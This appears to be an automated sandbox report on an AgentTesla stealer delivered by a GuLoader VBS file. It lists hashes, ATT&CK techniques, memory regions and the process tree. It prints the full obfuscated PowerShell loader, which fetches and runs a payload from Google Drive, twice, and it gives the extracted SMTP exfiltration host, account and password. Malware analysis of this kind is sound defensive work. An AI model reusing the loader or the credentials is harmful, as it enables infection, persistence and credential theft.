agenttesla | 047a32d755255cc196414105150bc45efe6bd37d1d0951ff7b7628321227cae6

Analysis

max time kernel
144s
max time network
133s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26-03-2024 12:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TRANSFERENCIA.vbs
Size

37KB
MD5

70e2f192eb252c254ebdfb15dd1f6817
SHA1

a62bf451789a65d45678e691760c81c3d412b49c
SHA256

047a32d755255cc196414105150bc45efe6bd37d1d0951ff7b7628321227cae6
SHA512

8e8b9b9068c37603e01c74a34c24400afb6594f2d05b9ea8969c3606ce128f4191650ec72437cab639c4c9af7522b1b6dc3425d7f6ab08d5bac5615a095efdbe
SSDEEP

768:u0zgBjYWAZGc8NnKwiQMYbAPjDpHLFggPYC:4YqNnKwkeAXhL6gPx

Score

10^/10

agenttesla guloader downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.cash4cars.nz
Port:
587
Username:
[email protected]
Password:
logs2024!
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

wab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
11 drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1668 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2332 powershell.exe
1668 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2332 set thread context of 1668 2332 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2888 powershell.exe
2332 powershell.exe
2332 powershell.exe
1668 wab.exe
1668 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2332 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2888 powershell.exe
Token: SeDebugPrivilege 2332 powershell.exe
Token: SeDebugPrivilege 1668 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
11	drive.google.com

flow	ioc
17	ip-api.com

pid	process
1668	wab.exe

pid	process
2332	powershell.exe
1668	wab.exe

description	pid	process	target process
PID 2332 set thread context of 1668	2332	powershell.exe	wab.exe

pid	process
2888	powershell.exe
2332	powershell.exe
2332	powershell.exe
1668	wab.exe
1668	wab.exe

pid	process
2332	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	1668	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1964 wrote to memory of 2888	1964	WScript.exe	powershell.exe
PID 1964 wrote to memory of 2888	1964	WScript.exe	powershell.exe
PID 1964 wrote to memory of 2888	1964	WScript.exe	powershell.exe
PID 2888 wrote to memory of 2524	2888	powershell.exe	cmd.exe
PID 2888 wrote to memory of 2524	2888	powershell.exe	cmd.exe
PID 2888 wrote to memory of 2524	2888	powershell.exe	cmd.exe
PID 2888 wrote to memory of 2332	2888	powershell.exe	powershell.exe
PID 2888 wrote to memory of 2332	2888	powershell.exe	powershell.exe
PID 2888 wrote to memory of 2332	2888	powershell.exe	powershell.exe
PID 2888 wrote to memory of 2332	2888	powershell.exe	powershell.exe
PID 2332 wrote to memory of 2844	2332	powershell.exe	cmd.exe
PID 2332 wrote to memory of 2844	2332	powershell.exe	cmd.exe
PID 2332 wrote to memory of 2844	2332	powershell.exe	cmd.exe
PID 2332 wrote to memory of 2844	2332	powershell.exe	cmd.exe
PID 2332 wrote to memory of 1668	2332	powershell.exe	wab.exe
PID 2332 wrote to memory of 1668	2332	powershell.exe	wab.exe
PID 2332 wrote to memory of 1668	2332	powershell.exe	wab.exe
PID 2332 wrote to memory of 1668	2332	powershell.exe	wab.exe
PID 2332 wrote to memory of 1668	2332	powershell.exe	wab.exe
PID 2332 wrote to memory of 1668	2332	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TRANSFERENCIA.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Disimpassioned parcelhusejernes nervepatient ngtede polyhaemic Landsforrder #>;$Martlemas=(cmd /c set /A 115^^0);Function Kipsey ([String]$Nephrotomies){$Electrotonizes=[char][int]$Martlemas+'ubstring';$Longicaudal=8;$Utmosts=Toxinosis26($Nephrotomies);For($Reparationsvrksted=7; $Reparationsvrksted -lt $Utmosts; $Reparationsvrksted+=$Longicaudal){$Markeringsfelter=$Nephrotomies.$Electrotonizes.Invoke($Reparationsvrksted, 1);$Turbith=$Turbith+$Markeringsfelter;}$Turbith;}function Sankthansbaal ($Parasuchian){& ($Esotropia) ($Parasuchian);}function Toxinosis26 ([String]$Rejfet){$Greentail=$Rejfet.Length-1;$Greentail;}$Vagtparaderne=Kipsey 'SkjorteTBengerdr F,stelaBldgrinnUtaknems Sv.nesfbrushoveAnskaffrC.ayiesr PreachiVerifiknSmutchigLdr raa ';$slantedness=Kipsey ' GeschfhKikker.t Morgent Rev ltp Gryd,ssAsk.bge:Palmery/Ekserci/Morgen dUnserflrorthoptikompletv CulmineGrundca.Kagosorg insolvosemip toU,gdommgfeudalilAvlshineNu.hale.na,urercIntravaoMed,ocamBrnesko/ Afp.snutriflorc Bang,e?Uncon,iedragonhxTymbalop non.ccoMindederTeks ndt,eklapp=PrivilydSndenvioFoldedrwconjoinn BreedilHonni go R ymemaThorou,dTriu,vi&Kna,rybiForpag.dMarkrpo=Tilsend1omregnivcivilisjEndossezSvrv.tsTTrimler8 Forp.gzW nterw0Syvaarsh BogfinbMiso,raMVirksomiSlskindoE.doradS Vandb XFo,eskrNLegegadkHaandre0DuikersiHofjgerPC.direc6OutpursnSuppeu,tBlanksvZH.patolzAgnaticzThemeleZdworkin_Impelle2,onorrsvSmalhanOUpdatab0Aphoru,pSteeple ';$Esotropia=Kipsey ' eredti CampimeSt rstaxCirkeld ';$spokesman=Kipsey 'Si.eman$Fusionsg EtablelTaarnfao Vel.aebKafferiaun,rmorlPicnice:offe.ceNkullagro lotyitmklorofoetipvogns Docile3Udfo,rt5 Preaff Alchem=.iscoli jertefSOrientetKera,noaTaagebarPralw,rtUprootr-LeasowoB .pposii amordntStemmepsBicycleTVariat,rRembo,ra Kampfrn Forly s Helfa.fFarvenaeOophoror Reg.ow Farvef-Dona,caSBesotteoSpnd,tau ProfitrCorrinacsenge,ieGavlvgg Failleb$Splashiswidowhol Ed lweaIntr,pen tockantDamgalne Beamfud L nsgrnRedonneeHandelssAsiphonsDo umen Murlac- TeamwiDLabyr.neChappalsale,zertMoralisiStintsfnNongildaBarytontNot,fici PagajsoFast.mrnSiculia Kobolte$UnderstPSurn mer Ki.opoo IntenscoldiesprDeekpaxeVin.sidaBerigeltRedefu.i Filtr v .enatsiZophiast Surfbry Brands ';Sankthansbaal (Kipsey ' Taskse$AntiarrgAbaramblMetallioU.pregnbUnmateraS.udsiglMindehj:LapsibiP Probler onvento MicrodcAft rnorKnaldroe cclaiaSha.lottAlkoh.li,olartrvViseingiIsaiasftA finnmyBraktea=Jag.rne$FrihedsesultrienUsurpatvSmackfu:Count oaHjttalep op,niop UndermdFlocculaSvejtset Destina Inhabi ') ;Sankthansbaal (Kipsey 'Mirk.neIpustenhmDeneziap Age acoKronernrF.ancoptDrift t- ComparM Pi.cago HyposudFiskeriuTavernelFuckupseFiltrat HvaelveBSmovsesi,eknocktBefringsAfricanT,angnserMarvellaCorruptnObsequisTakstlefhjlpel,eNudi.mpr Patt b ') ;$Procreativity=$Procreativity+'\Palmyrenian.Sny' ;Sankthansbaal (Kipsey 'Sujetsp$ Staff.gAhornenlDauphino RetsfobWhet,toaAllomerlLa.dbru:.oonotisOblocutkD.namitvFordrineBovarysr SquinseAttendasUnsabre=Jewel,b( SrbeskTBladelee.lyantssCryophitBremsni-exte,ocPRetir,naTegugurtSuperbthRestrov fordybe$SemisapPVoci,errFaglittoun.eutrcLiv.ryhr tapsameSubsi.ia Registt .ietfeiXanthiuv Gu.toriAfsmelttPeruaney sdeste)Bonefis ') ;while (-not $skveres) {Sankthansbaal (Kipsey ' Pro orIdominerfD savou skylig(Maaneds$OrkestrNUnridgeoTeddysbm Co grue amembesBiperso3 Skift.5Plemu l.OplaesnJtungnemoAftenshbUn,aileSUnwillatWoolsroa ReinhetOmdelereMeliora Bagager- Indhole Nomostq Intell Dehones$TriplumVstroganaForsynig Parse t Udst,ppGravlsmaDorkyrkr Umbraeacrissald Undisme,soglosrSneplovn FlungaeCrusf u)Pulveri Skuffel{ S.pervS ankrvetSamburuaI.accesrSkalle tThermon-Incr,stSConidael.ausatieEarthiae Koalacp Okk rf Rekonf1Skrum e} lectreSkurvoglEffe tisBanteree Card.o{subwariSMullah.tSheepifaRosier,r MassestRearr.n-.yzoneoSspisesklAngrebseParaphreBegribepScenisk Pro.und1.wiscar;OverligSGua.emaaPazareenUstad,gkRdbedemtMicr,phhLaanekoaterrac.n Alu.ins Refu,eb U.sletaHospitaa,epaticlSe ilen Outwigg$Hsblse,sSofficepUnderenoGratulek ScupcoeRebslagsTilbagemMajorisaForsnakn,ntenod}Queendo ');Sankthansbaal (Kipsey 'K llati$HydrodagReorganlKoerte.oStanglobSkannesaprovinslHaybo.b:Gvendess mmatrikPiroghivappendie Sanskrr ikkereToysomesSakrame=Onymi e(AntichuT alamine BibliosSaroscrtIndehol-AmylamiPCa.tocka nincistDekant hCrepies Ballon $ InerasP Dragomrge nemloReinvigcO dypegrAppalooe BredtfaPatentetOmarbeji KarikavrendejeiIde liztbecifreyOuroupa) Operet ') ;}Sankthansbaal (Kipsey ' selfin$ Nonsa,gKit elalBulder o B ickcbDesertraB.ggingl.ooknin:Co.potoB udfyldr.iveaudi ContincKapitalk SalsdrbUnderflaSo,rilytMrbanketb azileeElskerrdsa iriz Endothe= Sengel ProbabiGDingleve,aadedetSmalfil-ulvemlkCSaros,toCab,ioln F aadetSpindhre KinesenApprovatJvnald. datain$ A.lvniPPidgin,rO,fentlo EtnogrcKop masrFosf,rdeTyttebraRingea,tFlatteniPlasmoqvR sentfi KalkaftguatemayDecaste ');Sankthansbaal (Kipsey 'Skvatml$Gu.hibogIssuelelGymno,ooPr.sensb Undersa Epuratl edlige:NyanskaBNedsivneTo tinggPreconqrSchratmnSte,messTransit Anspori=Extrosp Type j[TelevseSRoquefoyElektrosInkvisitUndervae Blond,mSu cort. P,enesCLinjesto Stilren,lkevejv M.serseErotiserMon,strtWatersc]Mesterv:Slovint:PulmentFflutey,rComplemo EdanbymLevn,tpBSvinekdaDisro,ssarbitraeOmklamr6Vor,eds4EmbalmeSOff.rplt Fasci.rantiasci TrickinHistorig Tilhre(Dumfoun$MiltiesBRe.tergrSubjektiBankvsecP mpstek PhysiobManheadaHjemme.tToxi.ertSpadonieHypn.tid Kaolin)Haandgr ');Sankthansbaal (Kipsey 'Dy,efab$SprngemgAntidetl Attraao Murcheb Tids,sa Bjldedl erbyli:StvboldPOvercurePhyllodt Caponit Su,lateAnkerarrFa eldyswinkles Slunkne=Medicin Con ers[VaabensSPrecalcyUheldensSpinulat FiksereHert,llm encinc. No.dipTCochleaeAsyncpoxDomnestt Coron..EuropamE nido.onEtaminecSwa,tedoForvaltddaffod iEstim,tnIn,oxiog Friede]Quinqu : Abiosi: Ugli,iABerendsSInvaderCdamasceIOptic,sIBad,vre. DemilaGStereopeK,raktetAdmixtuSAnisboltHamamelr detiliTypisernLimaceagBortslb(Organ s$MeningsBLannileeArcs,negIntersprReallusnDism rtsFejlko.)Whiglin ');Sankthansbaal (Kipsey ' produk$ BndslegSskendelepicor omelvynrbBaroksta IndprelLesbisk:UdrejseUUnsym,tdEkviperfRedd rer Acclime Ironmal S.ortssKonvojeeAlquierrRejice s,abeisp=Counter$ ByrdefPCaref,leAfzeliatStttepitDoor.laeHeroifyrKommufas Turist.ScrapbosEncriniu yraadbI,scruts ThanketPatin.ur For.iliAngolann IndvirgPraktik( Gurgle3Motorca0grandfa4Remburs9Unterme4 Unmelo8Tegnflg,Devilfi3Skraare1 Storeb2 Kidd,e6Unserve7 Chipch)Eft,rtr ');Sankthansbaal $Udfrelsers;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2524

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Disimpassioned parcelhusejernes nervepatient ngtede polyhaemic Landsforrder #>;$Martlemas=(cmd /c set /A 115^^0);Function Kipsey ([String]$Nephrotomies){$Electrotonizes=[char][int]$Martlemas+'ubstring';$Longicaudal=8;$Utmosts=Toxinosis26($Nephrotomies);For($Reparationsvrksted=7; $Reparationsvrksted -lt $Utmosts; $Reparationsvrksted+=$Longicaudal){$Markeringsfelter=$Nephrotomies.$Electrotonizes.Invoke($Reparationsvrksted, 1);$Turbith=$Turbith+$Markeringsfelter;}$Turbith;}function Sankthansbaal ($Parasuchian){& ($Esotropia) ($Parasuchian);}function Toxinosis26 ([String]$Rejfet){$Greentail=$Rejfet.Length-1;$Greentail;}$Vagtparaderne=Kipsey 'SkjorteTBengerdr F,stelaBldgrinnUtaknems Sv.nesfbrushoveAnskaffrC.ayiesr PreachiVerifiknSmutchigLdr raa ';$slantedness=Kipsey ' GeschfhKikker.t Morgent Rev ltp Gryd,ssAsk.bge:Palmery/Ekserci/Morgen dUnserflrorthoptikompletv CulmineGrundca.Kagosorg insolvosemip toU,gdommgfeudalilAvlshineNu.hale.na,urercIntravaoMed,ocamBrnesko/ Afp.snutriflorc Bang,e?Uncon,iedragonhxTymbalop non.ccoMindederTeks ndt,eklapp=PrivilydSndenvioFoldedrwconjoinn BreedilHonni go R ymemaThorou,dTriu,vi&Kna,rybiForpag.dMarkrpo=Tilsend1omregnivcivilisjEndossezSvrv.tsTTrimler8 Forp.gzW nterw0Syvaarsh BogfinbMiso,raMVirksomiSlskindoE.doradS Vandb XFo,eskrNLegegadkHaandre0DuikersiHofjgerPC.direc6OutpursnSuppeu,tBlanksvZH.patolzAgnaticzThemeleZdworkin_Impelle2,onorrsvSmalhanOUpdatab0Aphoru,pSteeple ';$Esotropia=Kipsey ' eredti CampimeSt rstaxCirkeld ';$spokesman=Kipsey 'Si.eman$Fusionsg EtablelTaarnfao Vel.aebKafferiaun,rmorlPicnice:offe.ceNkullagro lotyitmklorofoetipvogns Docile3Udfo,rt5 Preaff Alchem=.iscoli jertefSOrientetKera,noaTaagebarPralw,rtUprootr-LeasowoB .pposii amordntStemmepsBicycleTVariat,rRembo,ra Kampfrn Forly s Helfa.fFarvenaeOophoror Reg.ow Farvef-Dona,caSBesotteoSpnd,tau ProfitrCorrinacsenge,ieGavlvgg Failleb$Splashiswidowhol Ed lweaIntr,pen tockantDamgalne Beamfud L nsgrnRedonneeHandelssAsiphonsDo umen Murlac- TeamwiDLabyr.neChappalsale,zertMoralisiStintsfnNongildaBarytontNot,fici PagajsoFast.mrnSiculia Kobolte$UnderstPSurn mer Ki.opoo IntenscoldiesprDeekpaxeVin.sidaBerigeltRedefu.i Filtr v .enatsiZophiast Surfbry Brands ';Sankthansbaal (Kipsey ' Taskse$AntiarrgAbaramblMetallioU.pregnbUnmateraS.udsiglMindehj:LapsibiP Probler onvento MicrodcAft rnorKnaldroe cclaiaSha.lottAlkoh.li,olartrvViseingiIsaiasftA finnmyBraktea=Jag.rne$FrihedsesultrienUsurpatvSmackfu:Count oaHjttalep op,niop UndermdFlocculaSvejtset Destina Inhabi ') ;Sankthansbaal (Kipsey 'Mirk.neIpustenhmDeneziap Age acoKronernrF.ancoptDrift t- ComparM Pi.cago HyposudFiskeriuTavernelFuckupseFiltrat HvaelveBSmovsesi,eknocktBefringsAfricanT,angnserMarvellaCorruptnObsequisTakstlefhjlpel,eNudi.mpr Patt b ') ;$Procreativity=$Procreativity+'\Palmyrenian.Sny' ;Sankthansbaal (Kipsey 'Sujetsp$ Staff.gAhornenlDauphino RetsfobWhet,toaAllomerlLa.dbru:.oonotisOblocutkD.namitvFordrineBovarysr SquinseAttendasUnsabre=Jewel,b( SrbeskTBladelee.lyantssCryophitBremsni-exte,ocPRetir,naTegugurtSuperbthRestrov fordybe$SemisapPVoci,errFaglittoun.eutrcLiv.ryhr tapsameSubsi.ia Registt .ietfeiXanthiuv Gu.toriAfsmelttPeruaney sdeste)Bonefis ') ;while (-not $skveres) {Sankthansbaal (Kipsey ' Pro orIdominerfD savou skylig(Maaneds$OrkestrNUnridgeoTeddysbm Co grue amembesBiperso3 Skift.5Plemu l.OplaesnJtungnemoAftenshbUn,aileSUnwillatWoolsroa ReinhetOmdelereMeliora Bagager- Indhole Nomostq Intell Dehones$TriplumVstroganaForsynig Parse t Udst,ppGravlsmaDorkyrkr Umbraeacrissald Undisme,soglosrSneplovn FlungaeCrusf u)Pulveri Skuffel{ S.pervS ankrvetSamburuaI.accesrSkalle tThermon-Incr,stSConidael.ausatieEarthiae Koalacp Okk rf Rekonf1Skrum e} lectreSkurvoglEffe tisBanteree Card.o{subwariSMullah.tSheepifaRosier,r MassestRearr.n-.yzoneoSspisesklAngrebseParaphreBegribepScenisk Pro.und1.wiscar;OverligSGua.emaaPazareenUstad,gkRdbedemtMicr,phhLaanekoaterrac.n Alu.ins Refu,eb U.sletaHospitaa,epaticlSe ilen Outwigg$Hsblse,sSofficepUnderenoGratulek ScupcoeRebslagsTilbagemMajorisaForsnakn,ntenod}Queendo ');Sankthansbaal (Kipsey 'K llati$HydrodagReorganlKoerte.oStanglobSkannesaprovinslHaybo.b:Gvendess mmatrikPiroghivappendie Sanskrr ikkereToysomesSakrame=Onymi e(AntichuT alamine BibliosSaroscrtIndehol-AmylamiPCa.tocka nincistDekant hCrepies Ballon $ InerasP Dragomrge nemloReinvigcO dypegrAppalooe BredtfaPatentetOmarbeji KarikavrendejeiIde liztbecifreyOuroupa) Operet ') ;}Sankthansbaal (Kipsey ' selfin$ Nonsa,gKit elalBulder o B ickcbDesertraB.ggingl.ooknin:Co.potoB udfyldr.iveaudi ContincKapitalk SalsdrbUnderflaSo,rilytMrbanketb azileeElskerrdsa iriz Endothe= Sengel ProbabiGDingleve,aadedetSmalfil-ulvemlkCSaros,toCab,ioln F aadetSpindhre KinesenApprovatJvnald. datain$ A.lvniPPidgin,rO,fentlo EtnogrcKop masrFosf,rdeTyttebraRingea,tFlatteniPlasmoqvR sentfi KalkaftguatemayDecaste ');Sankthansbaal (Kipsey 'Skvatml$Gu.hibogIssuelelGymno,ooPr.sensb Undersa Epuratl edlige:NyanskaBNedsivneTo tinggPreconqrSchratmnSte,messTransit Anspori=Extrosp Type j[TelevseSRoquefoyElektrosInkvisitUndervae Blond,mSu cort. P,enesCLinjesto Stilren,lkevejv M.serseErotiserMon,strtWatersc]Mesterv:Slovint:PulmentFflutey,rComplemo EdanbymLevn,tpBSvinekdaDisro,ssarbitraeOmklamr6Vor,eds4EmbalmeSOff.rplt Fasci.rantiasci TrickinHistorig Tilhre(Dumfoun$MiltiesBRe.tergrSubjektiBankvsecP mpstek PhysiobManheadaHjemme.tToxi.ertSpadonieHypn.tid Kaolin)Haandgr ');Sankthansbaal (Kipsey 'Dy,efab$SprngemgAntidetl Attraao Murcheb Tids,sa Bjldedl erbyli:StvboldPOvercurePhyllodt Caponit Su,lateAnkerarrFa eldyswinkles Slunkne=Medicin Con ers[VaabensSPrecalcyUheldensSpinulat FiksereHert,llm encinc. No.dipTCochleaeAsyncpoxDomnestt Coron..EuropamE nido.onEtaminecSwa,tedoForvaltddaffod iEstim,tnIn,oxiog Friede]Quinqu : Abiosi: Ugli,iABerendsSInvaderCdamasceIOptic,sIBad,vre. DemilaGStereopeK,raktetAdmixtuSAnisboltHamamelr detiliTypisernLimaceagBortslb(Organ s$MeningsBLannileeArcs,negIntersprReallusnDism rtsFejlko.)Whiglin ');Sankthansbaal (Kipsey ' produk$ BndslegSskendelepicor omelvynrbBaroksta IndprelLesbisk:UdrejseUUnsym,tdEkviperfRedd rer Acclime Ironmal S.ortssKonvojeeAlquierrRejice s,abeisp=Counter$ ByrdefPCaref,leAfzeliatStttepitDoor.laeHeroifyrKommufas Turist.ScrapbosEncriniu yraadbI,scruts ThanketPatin.ur For.iliAngolann IndvirgPraktik( Gurgle3Motorca0grandfa4Remburs9Unterme4 Unmelo8Tegnflg,Devilfi3Skraare1 Storeb2 Kidd,e6Unserve7 Chipch)Eft,rtr ');Sankthansbaal $Udfrelsers;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2844

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b5a8db5965fbde5657fa73cd29babf12

SHA1
0d81d1be21e00c86b02a43d2add3a74feaab3996

SHA256
0d194b68462d95d1f0f307d83258201495b453bd81bf8de2a67393d9db1e6822

SHA512
de0cb76a6dd1338ebdf836e89a8b38a17642845f0a53bd82ed89efcb4b16332326110ea13bb683e8638b045c6d615301745d8ed959970236fd5be98c42ec0a55

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5D7B.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L348C8YY74405QGGGXH3.temp

Filesize
7KB

MD5
9822232a755e972f4d058f2a7f9f9ade

SHA1
f2f0f04b0b483d739b38cb30ef2d260462e0f342

SHA256
6c708afa288f5768cc5efe09441281c0e9b5c3803d3bd53ba1a6434563758f84

SHA512
ee12072b75268976434e8cf50f1951c48f78c6d4815e3cae34f616da6942541375d5ee33e854b23017f54570ea7ea778e6a2befe4f6a3710f8c058167529809d

Download Submit
memory/1668-79-0x00000000221A0000-0x00000000221E0000-memory.dmp

Filesize
256KB

Download
memory/1668-78-0x000000006EF90000-0x000000006F67E000-memory.dmp

Filesize
6.9MB

Download
memory/1668-76-0x0000000001D70000-0x0000000004498000-memory.dmp

Filesize
39.2MB

Download
memory/1668-75-0x0000000000D00000-0x0000000000D42000-memory.dmp

Filesize
264KB

Download
memory/1668-74-0x0000000000D00000-0x0000000001D62000-memory.dmp

Filesize
16.4MB

Download
memory/1668-73-0x0000000000D00000-0x0000000001D62000-memory.dmp

Filesize
16.4MB

Download
memory/1668-46-0x0000000001D70000-0x0000000004498000-memory.dmp

Filesize
39.2MB

Download
memory/1668-84-0x000000006EF90000-0x000000006F67E000-memory.dmp

Filesize
6.9MB

Download
memory/1668-85-0x00000000221A0000-0x00000000221E0000-memory.dmp

Filesize
256KB

Download
memory/1668-50-0x0000000077740000-0x0000000077816000-memory.dmp

Filesize
856KB

Download
memory/1668-49-0x0000000077776000-0x0000000077777000-memory.dmp

Filesize
4KB

Download
memory/1668-48-0x0000000077550000-0x00000000776F9000-memory.dmp

Filesize
1.7MB

Download
memory/2332-16-0x0000000073600000-0x0000000073BAB000-memory.dmp

Filesize
5.7MB

Download
memory/2332-38-0x0000000073600000-0x0000000073BAB000-memory.dmp

Filesize
5.7MB

Download
memory/2332-77-0x00000000064C0000-0x0000000008BE8000-memory.dmp

Filesize
39.2MB

Download
memory/2332-15-0x0000000073600000-0x0000000073BAB000-memory.dmp

Filesize
5.7MB

Download
memory/2332-33-0x0000000002080000-0x00000000020C0000-memory.dmp

Filesize
256KB

Download
memory/2332-34-0x0000000005FD0000-0x00000000060D0000-memory.dmp

Filesize
1024KB

Download
memory/2332-35-0x0000000073600000-0x0000000073BAB000-memory.dmp

Filesize
5.7MB

Download
memory/2332-36-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/2332-37-0x00000000064C0000-0x0000000008BE8000-memory.dmp

Filesize
39.2MB

Download
memory/2332-19-0x0000000002080000-0x00000000020C0000-memory.dmp

Filesize
256KB

Download
memory/2332-39-0x00000000064C0000-0x0000000008BE8000-memory.dmp

Filesize
39.2MB

Download
memory/2332-40-0x0000000002080000-0x00000000020C0000-memory.dmp

Filesize
256KB

Download
memory/2332-42-0x0000000077550000-0x00000000776F9000-memory.dmp

Filesize
1.7MB

Download
memory/2332-44-0x0000000005FD0000-0x00000000060D0000-memory.dmp

Filesize
1024KB

Download
memory/2332-45-0x0000000077740000-0x0000000077816000-memory.dmp

Filesize
856KB

Download
memory/2332-17-0x0000000002080000-0x00000000020C0000-memory.dmp

Filesize
256KB

Download
memory/2332-47-0x00000000064C0000-0x0000000008BE8000-memory.dmp

Filesize
39.2MB

Download
memory/2888-29-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-18-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2888-30-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-4-0x000000001B1A0000-0x000000001B482000-memory.dmp

Filesize
2.9MB

Download
memory/2888-32-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-12-0x000000001B5C0000-0x000000001B5D2000-memory.dmp

Filesize
72KB

Download
memory/2888-11-0x000000001B630000-0x000000001B652000-memory.dmp

Filesize
136KB

Download
memory/2888-10-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2888-9-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-31-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-8-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-7-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2888-80-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2888-6-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2888-5-0x0000000002610000-0x0000000002618000-memory.dmp

Filesize
32KB

Download